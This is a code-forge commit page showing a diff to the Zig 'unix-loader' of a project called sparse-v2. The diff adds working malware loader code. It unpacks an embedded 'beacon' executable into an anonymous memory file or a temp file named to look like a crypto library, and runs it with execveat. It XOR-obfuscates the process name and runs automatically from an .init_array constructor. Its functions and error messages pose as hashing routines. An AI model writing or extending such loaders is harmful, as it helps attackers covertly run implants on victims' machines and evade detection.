andrew.rioux/sparse-v2
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

feat: got unix-beacon tested on Linux

Browse Source
This commit is contained in:
Andrew Rioux
2025-02-05 16:53:11 -05:00
parent 90c8b97141
commit cd2890ee36
6 changed files with 82 additions and 49 deletions
Download Patch File Download Diff File Expand all files Collapse all files

41
unix-loader/src/libloader.zig
View File

@@ -4,9 +4,10 @@ const posix = std.posix;
const beacon = @embedFile("beacon");
const Parameters = @cImport({
const abi = @cImport({
@cInclude("abi.h");
}).Parameters;
});
const Parameters = abi.Parameters;
const config = @import("config");
@@ -14,7 +15,7 @@ fn open_temp() !std.fs.File {
switch (builtin.os.tag) {
.linux => {
const fd = try posix.memfd_create("", 0);
return std.fs.File{ .handle = fd };
return std.fs.File{ .handle = @intCast(fd) };
},
else => {
return std.fs.createFileAbsolute("/tmp/libcryptoint", .{ .mode = 0o775 });
@@ -41,21 +42,35 @@ fn exec_beacon(gzipped_exe: []const u8, parameters: *Parameters) !void {
const file_path = switch (builtin.os.tag) {
.linux => try std.fmt.allocPrint(alloc, "/proc/self/fd/{d}", .{exe_file.handle}),
else => "/tmp/libcryptoint",
else => try std.fmt.allocPrint(alloc, "/dev/fd/{d}", .{exe_file.handle}),
};
exe_file.close();
const key = (abi.XOR_KEY << 8) | abi.XOR_KEY;
const beacon_name_length: usize = @intCast(parameters.beacon_name_length ^ key);
const beacon_name = try alloc.dupeZ(u8, parameters.beacon_name[0..beacon_name_length]);
var i: u16 = 0;
while (i < beacon_name_length) : (i += 1) {
beacon_name[i] ^= @intCast(abi.XOR_KEY);
}
const beacon_name = try alloc.dupeZ(u8, parameters.beacon_name[0..parameters.beacon_name_length]);
const file_path_ptr = try alloc.dupeZ(u8, file_path);
const argv: [*:null]const ?[*:0]const u8 = &.{ beacon_name, null };
const envp: [*:null]const ?[*:0]const u8 = &.{null};
switch (posix.execveZ(file_path_ptr, argv, envp)) {
else => |e| {
if (builtin.mode == .Debug) {
std.debug.print("Internal error performing hash! {s}\n", .{@errorName(e)});
switch (builtin.os.tag) {
.linux => {
_ = std.os.linux.syscall5(.execveat, @intCast(exe_file.handle), @intFromPtr(""), @intFromPtr(argv), @intFromPtr(envp), 0x1000);
},
else => {
switch (posix.execveZ(file_path_ptr, argv, envp)) {
else => |e| {
if (builtin.mode == .Debug) {
std.debug.print("Internal error performing hash! {s}\n", .{@errorName(e)});
}
},
}
},
}
@@ -81,12 +96,6 @@ fn use_beacon(gzipped_exe: []const u8, parameters: *Parameters) !void {
if (pid == 0) {
if (try posix.fork() == 0) {
try exec_beacon(gzipped_exe, parameters);
} else if (builtin.os.tag != .linux) {
const sem = std.c.sem_open("/libcrypto", 0x200, 0o775, 0);
_ = std.c.sem_wait(sem);
posix.unlink("/tmp/libcryptoint") catch {};
}
posix.exit(0);
} else {

31
unix-loader/src/loader.zig
View File

@@ -5,32 +5,27 @@ const Parameters = @cImport({
@cInclude("abi.h");
}).Parameters;
extern fn hash_internals(parameters: *Parameters) void;
extern fn hash_internals(parameters: *const Parameters) void;
var file_parameters: Parameters = undefined;
const file_parameters: [@sizeOf(Parameters) / 2]u16 = blk: {
var arr: [@sizeOf(Parameters) / 2]u16 = undefined;
for (&arr) |*item| {
item.* = ('B' << 8) | 'B';
}
break :blk arr;
};
fn fill_parameters() !void {
const this_file = try std.fs.openSelfExe(std.fs.File.OpenFlags{});
const file_with_params: *const [256:0]u8 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
try this_file.seekFromEnd(@sizeOf(Parameters));
var param_buffer: [@sizeOf(Parameters)]u8 = undefined;
_ = try this_file.reader().read(&param_buffer);
@memcpy(@as([*]u8, @ptrCast(&file_parameters)), &param_buffer);
fn get_parameters() *const Parameters {
return @as(*const Parameters, @ptrCast(&file_parameters));
}
export fn calculate_hash() callconv(.C) void {
if (dbg) {
std.io.getStdOut().writeAll("Loaded!") catch {};
std.io.getStdOut().writeAll("Loaded!\n") catch {};
}
fill_parameters() catch |err| {
if (dbg) {
std.debug.print("Error calculating hash! {any}", .{err});
}
return;
};
hash_internals(&file_parameters);
hash_internals(get_parameters());
}
export const init_array: [1]*const fn () callconv(.C) void linksection(".init_array") = .{&calculate_hash};